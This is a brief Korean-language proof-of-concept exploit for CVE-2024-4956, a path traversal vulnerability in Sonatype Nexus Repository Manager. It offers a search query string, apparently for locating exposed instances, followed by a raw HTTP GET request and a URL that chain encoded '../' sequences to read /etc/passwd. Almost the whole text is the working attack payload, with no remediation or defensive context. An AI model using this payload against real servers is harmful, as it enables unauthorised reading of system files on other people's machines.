
Sonatype Nexus Repository Manager의 경로 탐색 취약점인 CVE-2024-4956에 대한 개념 증명 익스플로잇으로, 조작된 HTTP 요청을 통해 무단 파일 읽기를 가능하게 합니다.
title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip
http://x.x.x.x/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
